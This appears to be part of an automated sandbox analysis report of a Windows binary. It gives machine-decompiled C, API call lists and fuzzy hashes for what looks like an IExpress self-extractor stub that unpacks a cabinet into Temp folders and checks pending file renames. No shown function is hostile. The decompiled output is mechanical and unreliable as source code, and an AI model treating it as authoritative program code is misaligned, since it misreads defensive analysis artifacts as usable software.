                                                0x002f5b52
                                                0x002f5b52
                                                0x002f5b5b
                                                0x002f5b62
                                                0x002f5b6b
                                                0x002f5b6d
                                                0x002f5b76
                                                0x002f5b7d
                                                0x002f5b83
                                                0x002f5b7f
                                                0x002f5b7f
                                                0x002f5b7f
                                                0x002f5b6f
                                                0x002f5b72
                                                0x002f5b72
                                                0x002f5b85
                                                0x002f5b98
                                                0x002f5b9e
                                                0x002f5b87
                                                0x002f5b8f
                                                0x002f5b8f
                                                0x00000000
                                                0x002f5b85
                                                0x002f5b29
                                                0x002f5b33
                                                0x00000000
                                                0x00000000
                                                0x002f5b35
                                                0x002f5b48
                                                0x002f5b4a
                                                0x00000000
                                                0x002f5b4a
                                                0x002f5b0f
                                                0x002f5b16
                                                0x00000000
                                                0x002f5b16
                                                0x002f5a7c
                                                0x002f5a8a
                                                0x002f5aa5
                                                0x002f5aab
                                                0x00000000
                                                0x002f59bb
                                                0x002f59c0
                                                0x002f59c7
                                                0x002f59d1
                                                0x002f59d6
                                                0x002f5c05
                                                0x002f5c14
                                                0x002f5c14

                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 002F59A8
                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 002F59AF
                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 002F5A13
                                                • MulDiv.KERNEL32(?,?,00000400), ref: 002F5A40
                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002F5A64
                                                • memset.MSVCRT ref: 002F5A7C
                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 002F5A98
                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 002F5AA5
                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 002F5BFC
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                  • Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                • String ID:
                                                • API String ID: 4237285672-0
                                                • Opcode ID: 658f39830429c3674705932ebd6f8d4b3dbe05732f4d10733b872eae8cb8c94e
                                                • Instruction ID: 207644cb8de6e5d646f20373e051cc56ccb8492ae6a8d8d99bd0cee03c1fe1c3
                                                • Opcode Fuzzy Hash: 658f39830429c3674705932ebd6f8d4b3dbe05732f4d10733b872eae8cb8c94e
                                                • Instruction Fuzzy Hash: DA7181B191021DABEB159F60DC89FFBB7ACEB48394F0440BAF645D2144DA709E95CF20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 374 2f4fe0-2f501a call 2f468f FindResourceA LoadResource LockResource 377 2f5161-2f5163 374->377 378 2f5020-2f5027 374->378 379 2f5029-2f5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 2f5057-2f505e call 2f4efd 378->380 379->380 383 2f507c-2f50b4 380->383 384 2f5060-2f5077 call 2f44b9 380->384 389 2f50e8-2f5104 call 2f44b9 383->389 390 2f50b6-2f50da 383->390 388 2f5107-2f510e 384->388 391 2f511d-2f511f 388->391 392 2f5110-2f5117 FreeResource 388->392 402 2f5106 389->402 401 2f50dc 390->401 390->402 394 2f513a-2f5141 391->394 395 2f5121-2f5127 391->395 392->391 399 2f515f 394->399 400 2f5143-2f514a 394->400 395->394 398 2f5129-2f5135 call 2f44b9 395->398 398->394 399->377 400->399 404 2f514c-2f5159 SendMessageA 400->404 405 2f50e3-2f50e6 401->405 402->388 404->399 405->389 405->402
                                                C-Code - Quality: 77%
                                                			E002F4FE0(void* __edi, void* __eflags) {
                                                				void* __ebx;
                                                				void* _t8;
                                                				struct HWND__* _t9;
                                                				int _t10;
                                                				void* _t12;
                                                				struct HWND__* _t24;
                                                				struct HWND__* _t27;
                                                				intOrPtr _t29;
                                                				void* _t33;
                                                				int _t34;
                                                				CHAR* _t36;
                                                				int _t37;
                                                				intOrPtr _t47;
                                                
                                                				_t33 = __edi;
                                                				_t36 = "CABINET";
                                                				 *0x2f9144 = E002F468F(_t36, 0, 0);
                                                				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                				 *0x2f9140 = _t8;
                                                				if(_t8 == 0) {
                                                					return _t8;
                                                				}
                                                				_t9 =  *0x2f8584; // 0x0
                                                				if(_t9 != 0) {
                                                					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                					ShowWindow(GetDlgItem( *0x2f8584, 0x841), 5);
                                                				}
                                                				_t10 = E002F4EFD(0, 0);
                                                				if(_t10 != 0) {
                                                					__imp__#20(E002F4CA0, E002F4CC0, E002F4980, E002F4A50, E002F4AD0, E002F4B60, E002F4BC0, 1, 0x2f9148, _t33);
                                                					_t34 = _t10;
                                                					if(_t34 == 0) {
                                                						L8:
                                                						_t29 =  *0x2f9148; // 0x0
                                                						_t24 =  *0x2f8584; // 0x0
                                                						E002F44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                						_t37 = 0;
                                                						L9:
                                                						goto L10;
                                                					}
                                                					__imp__#22(_t34, "*MEMCAB", 0x2f1140, 0, E002F4CD0, 0, 0x2f9140); // executed
                                                					_t37 = _t10;
                                                					if(_t37 == 0) {
                                                						goto L9;
                                                					}
                                                					__imp__#23(_t34); // executed
                                                					if(_t10 != 0) {
                                                						goto L9;
                                                					}
                                                					goto L8;
                                                				} else {
                                                					_t27 =  *0x2f8584; // 0x0
                                                					E002F44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                					_t37 = 0;
                                                					L10:
                                                					_t12 =  *0x2f9140; // 0x0
                                                					if(_t12 != 0) {
                                                						FreeResource(_t12);
                                                						 *0x2f9140 = 0;
                                                					}
                                                					if(_t37 == 0) {
                                                						_t47 =  *0x2f91d8; // 0x0
                                                						if(_t47 == 0) {
                                                							E002F44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                						}
                                                					}
                                                					if(( *0x2f8a38 & 0x00000001) == 0 && ( *0x2f9a34 & 0x00000001) == 0) {
                                                						SendMessageA( *0x2f8584, 0xfa1, _t37, 0);
                                                					}
                                                					return _t37;
                                                				}
                                                			}
















                                                0x002f4fe0
                                                0x002f4fe6
                                                0x002f4ff9
                                                0x002f500d
                                                0x002f5013
                                                0x002f501a
                                                0x002f5163
                                                0x002f5163
                                                0x002f5020
                                                0x002f5027
                                                0x002f5037
                                                0x002f5051
                                                0x002f5051
                                                0x002f5057
                                                0x002f505e
                                                0x002f50a7
                                                0x002f50ad
                                                0x002f50b4
                                                0x002f50e8
                                                0x002f50e8
                                                0x002f50ee
                                                0x002f50ff
                                                0x002f5104
                                                0x002f5106
                                                0x00000000
                                                0x002f5106
                                                0x002f50cd
                                                0x002f50d3
                                                0x002f50da
                                                0x00000000
                                                0x00000000
                                                0x002f50dd
                                                0x002f50e6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f5060
                                                0x002f5060
                                                0x002f5070
                                                0x002f5075
                                                0x002f5107
                                                0x002f5107
                                                0x002f510e
                                                0x002f5111
                                                0x002f5117
                                                0x002f5117
                                                0x002f511f
                                                0x002f5121
                                                0x002f5127
                                                0x002f5135
                                                0x002f5135
                                                0x002f5127
                                                0x002f5141
                                                0x002f5159
                                                0x002f5159
                                                0x00000000
                                                0x002f515f

                                                APIs
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
                                                  • Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
                                                  • Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
                                                  • Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
                                                  • Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
                                                  • Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF
                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 002F4FFE
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 002F5006
                                                • LockResource.KERNEL32(00000000), ref: 002F500D
                                                • GetDlgItem.USER32(00000000,00000842), ref: 002F5030
                                                • ShowWindow.USER32(00000000), ref: 002F5037
                                                • GetDlgItem.USER32(00000841,00000005), ref: 002F504A
                                                • ShowWindow.USER32(00000000), ref: 002F5051
                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 002F5111
                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 002F5159
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                • String ID: *MEMCAB$CABINET
                                                • API String ID: 1305606123-2642027498
                                                • Opcode ID: f0c43200beb07915e5e95e82d0a1bc1d7bcabd550980d769674afbc2d3a61be6
                                                • Instruction ID: 8df80f59515a0d900245c18bae27fe6e74e815c266a0657de8b377f989be6cae
                                                • Opcode Fuzzy Hash: f0c43200beb07915e5e95e82d0a1bc1d7bcabd550980d769674afbc2d3a61be6
                                                • Instruction Fuzzy Hash: 6831F5B075031A6BE7206B65BD8EF37F65CAB06BE4F050035FB0DA2291DBA59C60CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 95%
                                                			E002F53A1(CHAR* __ecx, CHAR* __edx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t5;
                                                				long _t13;
                                                				int _t14;
                                                				CHAR* _t20;
                                                				int _t29;
                                                				int _t30;
                                                				CHAR* _t32;
                                                				signed int _t33;
                                                				void* _t34;
                                                
                                                				_t5 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t5 ^ _t33;
                                                				_t32 = __edx;
                                                				_t20 = __ecx;
                                                				_t29 = 0;
                                                				while(1) {
                                                					E002F171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                					_t34 = _t34 + 0x10;
                                                					_t29 = _t29 + 1;
                                                					E002F1680(_t32, 0x104, _t20);
                                                					E002F658A(_t32, 0x104,  &_v268); // executed
                                                					RemoveDirectoryA(_t32); // executed
                                                					_t13 = GetFileAttributesA(_t32); // executed
                                                					if(_t13 == 0xffffffff) {
                                                						break;
                                                					}
                                                					if(_t29 < 0x190) {
                                                						continue;
                                                					}
                                                					L3:
                                                					_t30 = 0;
                                                					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                						_t30 = 1;
                                                						DeleteFileA(_t32);
                                                						CreateDirectoryA(_t32, 0);
                                                					}
                                                					L5:
                                                					return E002F6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                				}
                                                				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                				if(_t14 == 0) {
                                                					goto L3;
                                                				}
                                                				_t30 = 1;
                                                				 *0x2f8a20 = 1;
                                                				goto L5;
                                                			}

















                                                0x002f53ac
                                                0x002f53b3
                                                0x002f53b9
                                                0x002f53bb
                                                0x002f53bd
                                                0x002f53bf
                                                0x002f53d1
                                                0x002f53d6
                                                0x002f53e0
                                                0x002f53e2
                                                0x002f53f5
                                                0x002f53fb
                                                0x002f5402
                                                0x002f540b
                                                0x00000000
                                                0x00000000
                                                0x002f5413
                                                0x00000000
                                                0x00000000
                                                0x002f5415
                                                0x002f5416
                                                0x002f5427
                                                0x002f542a
                                                0x002f542b
                                                0x002f5434
                                                0x002f5434
                                                0x002f543a
                                                0x002f544c
                                                0x002f544c
                                                0x002f5452
                                                0x002f545a
                                                0x00000000
                                                0x00000000
                                                0x002f545e
                                                0x002f545f
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 002F171E: _vsnprintf.MSVCRT ref: 002F1750
                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F53FB
                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5402
                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F541F
                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F542B
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5434
                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5452
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                • API String ID: 1082909758-2818522747
                                                • Opcode ID: 0b73e671ab033b9641ec607cddf56df7564ac3204487751c8897c3bd0db69139
                                                • Instruction ID: acc0c24ac5bde5b0d17540c6bdb0cca65aca298d270133f34e3940b49636bf8e
                                                • Opcode Fuzzy Hash: 0b73e671ab033b9641ec607cddf56df7564ac3204487751c8897c3bd0db69139
                                                • Instruction Fuzzy Hash: 2911E6B131151867D7109F26BC4DFBBB65DDFC17A1F400079B74AD2190DE748962CAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 478 2f5467-2f5484 479 2f551c-2f5528 call 2f1680 478->479 480 2f548a-2f5490 call 2f53a1 478->480 484 2f552d-2f5539 call 2f58c8 479->484 483 2f5495-2f5497 480->483 485 2f549d-2f54c0 call 2f1781 483->485 486 2f5581-2f5583 483->486 493 2f554d-2f5552 484->493 494 2f553b-2f5545 CreateDirectoryA 484->494 495 2f550c-2f551a call 2f658a 485->495 496 2f54c2-2f54d8 GetSystemInfo 485->496 489 2f558d-2f559d call 2f6ce0 486->489 500 2f5585-2f558b 493->500 501 2f5554-2f5557 call 2f597d 493->501 498 2f5577-2f557c call 2f6285 494->498 499 2f5547 494->499 495->484 504 2f54fe 496->504 505 2f54da-2f54dd 496->505 498->486 499->493 500->489 511 2f555c-2f555e 501->511 512 2f5503-2f5507 call 2f658a 504->512 509 2f54df-2f54e2 505->509 510 2f54f7-2f54fc 505->510 513 2f54e4-2f54e7 509->513 514 2f54f0-2f54f5 509->514 510->512 511->500 515 2f5560-2f5566 511->515 512->495 513->495 517 2f54e9-2f54ee 513->517 514->512 515->486 518 2f5568-2f5575 RemoveDirectoryA 515->518 517->512 518->486
                                                C-Code - Quality: 75%
                                                			E002F5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				struct _SYSTEM_INFO _v304;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t10;
                                                				void* _t13;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				void* _t20;
                                                				signed int _t26;
                                                				void* _t28;
                                                				void* _t29;
                                                				CHAR* _t48;
                                                				signed int _t49;
                                                				intOrPtr _t61;
                                                
                                                				_t10 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t10 ^ _t49;
                                                				_push(__ecx);
                                                				if(__edx == 0) {
                                                					_t48 = 0x2f91e4;
                                                					_t42 = 0x104;
                                                					E002F1680(0x2f91e4, 0x104);
                                                					L14:
                                                					_t13 = E002F58C8(_t48); // executed
                                                					if(_t13 != 0) {
                                                						L17:
                                                						_t42 = _a4;
                                                						if(_a4 == 0) {
                                                							L23:
                                                							 *0x2f9124 = 0;
                                                							_t14 = 1;
                                                							L24:
                                                							return E002F6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                						}
                                                						_t16 = E002F597D(_t48, _t42, 1, 0); // executed
                                                						if(_t16 != 0) {
                                                							goto L23;
                                                						}
                                                						_t61 =  *0x2f8a20; // 0x0
                                                						if(_t61 != 0) {
                                                							 *0x2f8a20 = 0;
                                                							RemoveDirectoryA(_t48);
                                                						}
                                                						L22:
                                                						_t14 = 0;
                                                						goto L24;
                                                					}
                                                					if(CreateDirectoryA(_t48, 0) == 0) {
                                                						 *0x2f9124 = E002F6285();
                                                						goto L22;
                                                					}
                                                					 *0x2f8a20 = 1;
                                                					goto L17;
                                                				}
                                                				_t42 =  &_v268;
                                                				_t20 = E002F53A1(__ecx,  &_v268); // executed
                                                				if(_t20 == 0) {
                                                					goto L22;
                                                				}
                                                				_push(__ecx);
                                                				_t48 = 0x2f91e4;
                                                				E002F1781(0x2f91e4, 0x104, __ecx,  &_v268);
                                                				if(( *0x2f9a34 & 0x00000020) == 0) {
                                                					L12:
                                                					_t42 = 0x104;
                                                					E002F658A(_t48, 0x104, 0x2f1140);
                                                					goto L14;
                                                				}
                                                				GetSystemInfo( &_v304);
                                                				_t26 = _v304.dwOemId & 0x0000ffff;
                                                				if(_t26 == 0) {
                                                					_push("i386");
                                                					L11:
                                                					E002F658A(_t48, 0x104);
                                                					goto L12;
                                                				}
                                                				_t28 = _t26 - 1;
                                                				if(_t28 == 0) {
                                                					_push("mips");
                                                					goto L11;
                                                				}
                                                				_t29 = _t28 - 1;
                                                				if(_t29 == 0) {
                                                					_push("alpha");
                                                					goto L11;
                                                				}
                                                				if(_t29 != 1) {
                                                					goto L12;
                                                				}
                                                				_push("ppc");
                                                				goto L11;
                                                			}




















                                                0x002f5472
                                                0x002f5479
                                                0x002f5481
                                                0x002f5484
                                                0x002f551c
                                                0x002f5521
                                                0x002f5528
                                                0x002f552d
                                                0x002f552f
                                                0x002f5539
                                                0x002f554d
                                                0x002f554d
                                                0x002f5552
                                                0x002f5585
                                                0x002f5585
                                                0x002f558b
                                                0x002f558d
                                                0x002f559d
                                                0x002f559d
                                                0x002f5557
                                                0x002f555e
                                                0x00000000
                                                0x00000000
                                                0x002f5560
                                                0x002f5566
                                                0x002f5569
                                                0x002f556f
                                                0x002f556f
                                                0x002f5581
                                                0x002f5581
                                                0x00000000
                                                0x002f5581
                                                0x002f5545
                                                0x002f557c
                                                0x00000000
                                                0x002f557c
                                                0x002f5547
                                                0x00000000
                                                0x002f5547
                                                0x002f548a
                                                0x002f5490
                                                0x002f5497
                                                0x00000000
                                                0x00000000
                                                0x002f549d
                                                0x002f54ab
                                                0x002f54b4
                                                0x002f54c0
                                                0x002f550c
                                                0x002f5511
                                                0x002f5515
                                                0x00000000
                                                0x002f5515
                                                0x002f54c9
                                                0x002f54d6
                                                0x002f54d8
                                                0x002f54fe
                                                0x002f5503
                                                0x002f5507
                                                0x00000000
                                                0x002f5507
                                                0x002f54da
                                                0x002f54dd
                                                0x002f54f7
                                                0x00000000
                                                0x002f54f7
                                                0x002f54df
                                                0x002f54e2
                                                0x002f54f0
                                                0x00000000
                                                0x002f54f0
                                                0x002f54e7
                                                0x00000000
                                                0x00000000
                                                0x002f54e9
                                                0x00000000

                                                APIs
                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F54C9
                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F553D
                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F556F
                                                  • Part of subcall function 002F53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F53FB
                                                  • Part of subcall function 002F53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5402
                                                  • Part of subcall function 002F53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F541F
                                                  • Part of subcall function 002F53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F542B
                                                  • Part of subcall function 002F53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5434
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                • API String ID: 1979080616-787463151
                                                • Opcode ID: edb63c69fd107a82ed7622035706f3229d39166c5c95218984a46efcb3240a86
                                                • Instruction ID: b07a5480e53a4ed57a4acfad6d7e9b982f48870d9f24b675226783e593dc80ee
                                                • Opcode Fuzzy Hash: edb63c69fd107a82ed7622035706f3229d39166c5c95218984a46efcb3240a86
                                                • Instruction Fuzzy Hash: 6531F871730A2E97CB105F25AC48E7FF69AAF817D0B94017AAB05D2540DA748E71CA91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 519 2f256d-2f257d 520 2f2583-2f2589 519->520 521 2f2622-2f2627 call 2f24e0 519->521 522 2f258b 520->522 523 2f25e8-2f2607 RegOpenKeyExA 520->523 525 2f2629-2f262f 521->525 522->525 526 2f2591-2f2595 522->526 527 2f2609-2f2620 RegQueryInfoKeyA 523->527 528 2f25e3-2f25e6 523->528 526->525 530 2f259b-2f25ba RegOpenKeyExA 526->530 531 2f25d1-2f25dd RegCloseKey 527->531 528->525 530->528 532 2f25bc-2f25cb RegQueryValueExA 530->532 531->528 532->531
                                                C-Code - Quality: 86%
                                                			E002F256D(signed int __ecx) {
                                                				int _v8;
                                                				void* _v12;
                                                				signed int _t13;
                                                				signed int _t19;
                                                				long _t24;
                                                				void* _t26;
                                                				int _t31;
                                                				void* _t34;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t13 = __ecx & 0x0000ffff;
                                                				_t31 = 0;
                                                				if(_t13 == 0) {
                                                					_t31 = E002F24E0(_t26);
                                                				} else {
                                                					_t34 = _t13 - 1;
                                                					if(_t34 == 0) {
                                                						_v8 = 0;
                                                						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                							goto L7;
                                                						} else {
                                                							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                							goto L6;
                                                						}
                                                						L12:
                                                					} else {
                                                						if(_t34 > 0 && __ecx <= 3) {
                                                							_v8 = 0;
                                                							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                							if(_t24 == 0) {
                                                								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                								L6:
                                                								asm("sbb eax, eax");
                                                								_v8 = _v8 &  !( ~_t19);
                                                								RegCloseKey(_v12); // executed
                                                							}
                                                							L7:
                                                							_t31 = _v8;
                                                						}
                                                					}
                                                				}
                                                				return _t31;
                                                				goto L12;
                                                			}











                                                0x002f2572
                                                0x002f2573
                                                0x002f2575
                                                0x002f2578
                                                0x002f257d
                                                0x002f2627
                                                0x002f2583
                                                0x002f2586
                                                0x002f2589
                                                0x002f25eb
                                                0x002f2607
                                                0x00000000
                                                0x002f2609
                                                0x002f261a
                                                0x00000000
                                                0x002f261a
                                                0x00000000
                                                0x002f258b
                                                0x002f258b
                                                0x002f259e
                                                0x002f25b2
                                                0x002f25ba
                                                0x002f25cb
                                                0x002f25d1
                                                0x002f25d6
                                                0x002f25da
                                                0x002f25dd
                                                0x002f25dd
                                                0x002f25e3
                                                0x002f25e3
                                                0x002f25e3
                                                0x002f258b
                                                0x002f2589
                                                0x002f262f
                                                0x00000000

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,002F4096,002F4096,?,002F1ED3,00000001,00000000,?,?,002F4137,?), ref: 002F25B2
                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,002F4096,?,002F1ED3,00000001,00000000,?,?,002F4137,?,002F4096), ref: 002F25CB
                                                • RegCloseKey.KERNELBASE(?,?,002F1ED3,00000001,00000000,?,?,002F4137,?,002F4096), ref: 002F25DD
                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,002F4096,002F4096,?,002F1ED3,00000001,00000000,?,?,002F4137,?), ref: 002F25FF
                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,002F4096,00000000,00000000,00000000,00000000,?,002F1ED3,00000001,00000000), ref: 002F261A
                                                Strings
                                                • PendingFileRenameOperations, xrefs: 002F25C3
                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 002F25A8
                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 002F25F5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
